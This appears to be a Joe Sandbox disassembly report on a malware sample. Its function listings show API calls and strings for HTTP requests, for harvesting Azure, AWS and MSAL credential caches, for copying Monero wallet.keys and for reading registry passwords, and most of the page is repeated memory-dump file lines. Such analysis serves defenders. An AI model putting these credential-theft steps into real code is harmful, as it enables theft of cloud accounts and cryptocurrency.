Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 1868b02187b2344d64c490a949de8e2ecb1566a3e64f36a342c59fcc0549ae72
Instruction ID: 6794d238d01c2f8800a8aa5f5c5d6135ca01947d2114602858d912711f958311
Opcode Fuzzy Hash: 1868b02187b2344d64c490a949de8e2ecb1566a3e64f36a342c59fcc0549ae72
Instruction Fuzzy Hash: B9813F719102189BEB29DB50CC95FEAB7BCFF58700F408299F189A6180DFB16B85CF91

Function 000F6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000F4839
Part of subcall function 000F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000F4849

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

InternetOpenA.WININET(00110DFE,00000001,00000000,00000000,00000000), ref: 000F62E1
StrCmpCA.SHLWAPI(?,00CDE928), ref: 000F6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000F6335
HttpOpenRequestA.WININET(00000000,GET,?,00CDDFC8,00000000,00000000,00400100,00000000), ref: 000F6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000F63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000F63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000F63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 000F646D
InternetCloseHandle.WININET(00000000), ref: 000F64EF
InternetCloseHandle.WININET(00000000), ref: 000F64F9
InternetCloseHandle.WININET(00000000), ref: 000F6503

Strings

ERROR, xrefs: 000F6407
GET, xrefs: 000F637C
ERROR, xrefs: 000F64C9

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 6d1a6a6f6345ca7c8a2a45ca70b8948794b0c2022f2305e2f16d1e23d20c146e
Instruction ID: dc64f7ee05d6037e4a1ab46b9f4b5e1353f30761af5ec71e8dc3b832f9d7b852
Opcode Fuzzy Hash: 6d1a6a6f6345ca7c8a2a45ca70b8948794b0c2022f2305e2f16d1e23d20c146e
Instruction Fuzzy Hash: 3B716F71A00318ABDB24EBA0DC89FEE77B8BF44700F508159F20A6B5D0DBB56A85DF51

Function 00105510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A820: lstrlen.KERNEL32(000F4F05,?,?,000F4F05,00110DDE), ref: 0010A82B
Part of subcall function 0010A820: lstrcpy.KERNEL32(00110DDE,00000000), ref: 0010A885

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00105644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001056A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00105857

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 001051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00105228

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 001052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00105318
Part of subcall function 001052C0: lstrlen.KERNEL32(00000000), ref: 0010532F
Part of subcall function 001052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00105364
Part of subcall function 001052C0: lstrlen.KERNEL32(00000000), ref: 00105383
Part of subcall function 001052C0: lstrlen.KERNEL32(00000000), ref: 001053AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0010578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00105940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00105A0C
Sleep.KERNEL32(0000EA60), ref: 00105A1B

Strings

ERROR, xrefs: 00105849
ERROR, xrefs: 00105636
ERROR, xrefs: 001059FE
ERROR, xrefs: 00105693
ERROR, xrefs: 0010577D
ERROR, xrefs: 00105932

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: c50650a9ffc88f4e73f918abac7e24f46712bf9b7db93c48dc543eadd8d57d4a
Instruction ID: 1d7852f93d6ceb558217b7ab643bfc4e027f4e1dcb7676c191340cbac0b703f1
Opcode Fuzzy Hash: c50650a9ffc88f4e73f918abac7e24f46712bf9b7db93c48dc543eadd8d57d4a
Instruction Fuzzy Hash: ACE142719106089ADB08FBA0DC96EFE733DAF64301F80C529B586570D1EFB56A49CB92

Function 00104D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00108DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00108E0B

lstrcat.KERNEL32(?,00000000), ref: 00104DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00104DCD

Part of subcall function 00104910: wsprintfA.USER32 ref: 0010492C
Part of subcall function 00104910: FindFirstFileA.KERNEL32(?,?), ref: 00104943

lstrcat.KERNEL32(?,00000000), ref: 00104E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00104E59

Part of subcall function 00104910: StrCmpCA.SHLWAPI(?,00110FDC), ref: 00104971
Part of subcall function 00104910: StrCmpCA.SHLWAPI(?,00110FE0), ref: 00104987
Part of subcall function 00104910: FindNextFileA.KERNEL32(000000FF,?), ref: 00104B7D
Part of subcall function 00104910: FindClose.KERNEL32(000000FF), ref: 00104B92

lstrcat.KERNEL32(?,00000000), ref: 00104EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00104EE5

Part of subcall function 00104910: wsprintfA.USER32 ref: 001049B0
Part of subcall function 00104910: StrCmpCA.SHLWAPI(?,001108D2), ref: 001049C5
Part of subcall function 00104910: wsprintfA.USER32 ref: 001049E2
Part of subcall function 00104910: PathMatchSpecA.SHLWAPI(?,?), ref: 00104A1E
Part of subcall function 00104910: lstrcat.KERNEL32(?,00CDE8A8), ref: 00104A4A
Part of subcall function 00104910: lstrcat.KERNEL32(?,00110FF8), ref: 00104A5C
Part of subcall function 00104910: lstrcat.KERNEL32(?,?), ref: 00104A70
Part of subcall function 00104910: lstrcat.KERNEL32(?,00110FFC), ref: 00104A82
Part of subcall function 00104910: lstrcat.KERNEL32(?,?), ref: 00104A96
Part of subcall function 00104910: CopyFileA.KERNEL32(?,?,00000001), ref: 00104AAC
Part of subcall function 00104910: DeleteFileA.KERNEL32(?), ref: 00104B31

Strings

\.IdentityService\, xrefs: 00104ED9
\.aws\, xrefs: 00104E4D
Azure\.IdentityService, xrefs: 00104EEB
msal.cache, xrefs: 00104EF0
Azure\.azure, xrefs: 00104DD3
\.azure\, xrefs: 00104DC1
*.*, xrefs: 00104DD8
*.*, xrefs: 00104E64
Azure\.aws, xrefs: 00104E5F

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: dae114a92fcba037f5d2c9b0704d8734293dd9a3b735d93c6ae0ebc465782e9b
Instruction ID: 39bfd57467cb6d999d7649d96ce4b1ac26493956b408b85f543f464b2c51cccf
Opcode Fuzzy Hash: dae114a92fcba037f5d2c9b0704d8734293dd9a3b735d93c6ae0ebc465782e9b
Instruction Fuzzy Hash: 314183BA940218A7D754F760DC87FED7638AB24705F4044647285660C1EFF59BC98B92

Function 000F1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000F12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000F12B4
Part of subcall function 000F12A0: RtlAllocateHeap.NTDLL(00000000), ref: 000F12BB
Part of subcall function 000F12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 000F12D7
Part of subcall function 000F12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000F12F5
Part of subcall function 000F12A0: RegCloseKey.ADVAPI32(?), ref: 000F12FF

lstrcat.KERNEL32(?,00000000), ref: 000F134F
lstrlen.KERNEL32(?), ref: 000F135C
lstrcat.KERNEL32(?,.keys), ref: 000F1377

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 00108B60: GetSystemTime.KERNEL32(00110E1A,00CDA8E0,001105AE,?,?,000F13F9,?,0000001A,00110E1A,00000000,?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 00108B86

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 000F1465

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000F99EC
Part of subcall function 000F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000F9A11
Part of subcall function 000F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 000F9A31
Part of subcall function 000F99C0: ReadFile.KERNEL32(000000FF,?,00000000,000F148F,00000000), ref: 000F9A5A
Part of subcall function 000F99C0: LocalFree.KERNEL32(000F148F), ref: 000F9A90
Part of subcall function 000F99C0: CloseHandle.KERNEL32(000000FF), ref: 000F9A9A

DeleteFileA.KERNEL32(00000000), ref: 000F14EF

Strings

.keys, xrefs: 000F136B
SOFTWARE\monero-project\monero-core, xrefs: 000F1335
\Monero\wallet.keys, xrefs: 000F138D
wallet_path, xrefs: 000F1330

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 6d1912c55af235eb6d4e08c4a19024b1f305472547e8ebfe75d50ed2f1d06a58
Instruction ID: 7620af0dbb3e1dc35fa4a7f9160fb27567b54093bd56fc5279c723938ad290b4
Opcode Fuzzy Hash: 6d1912c55af235eb6d4e08c4a19024b1f305472547e8ebfe75d50ed2f1d06a58
Instruction Fuzzy Hash: 1E5135B1D5021997CB15FB60DD92FED737CAF64700F8041A8B64A620C2EF706B89CB96

Function 000F75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000F72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 000F733A
Part of subcall function 000F72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000F73B1
Part of subcall function 000F72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000F740D
Part of subcall function 000F72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 000F7452
Part of subcall function 000F72D0: HeapFree.KERNEL32(00000000), ref: 000F7459

lstrcat.KERNEL32(2F4AD020,001117FC), ref: 000F7606
lstrcat.KERNEL32(2F4AD020,00000000), ref: 000F7648
lstrcat.KERNEL32(2F4AD020, : ), ref: 000F765A
lstrcat.KERNEL32(2F4AD020,00000000), ref: 000F768F
lstrcat.KERNEL32(2F4AD020,00111804), ref: 000F76A0
lstrcat.KERNEL32(2F4AD020,00000000), ref: 000F76D3
lstrcat.KERNEL32(2F4AD020,00111808), ref: 000F76ED
task.LIBCPMTD ref: 000F76FB

Strings

: , xrefs: 000F764E

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 6763ba1842e5536a25d70168ad7cc895b23c7bceddd4e762873d7ccfc6bf5a3b
Instruction ID: 0744d609d5867b272798797a1a75e549f4077d87051b1f9000c33348e8c2858c
Opcode Fuzzy Hash: 6763ba1842e5536a25d70168ad7cc895b23c7bceddd4e762873d7ccfc6bf5a3b
Instruction Fuzzy Hash: 1A314C71900509EFCB09EBB4DC96DFE777CBB44302F148118F242A76A1DB35A946DB52

Function 00107500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00107542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0010757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00107603
RtlAllocateHeap.NTDLL(00000000), ref: 0010760A
wsprintfA.USER32 ref: 00107640

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Strings

\, xrefs: 00107560
C, xrefs: 0010754C
:, xrefs: 0010755C

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
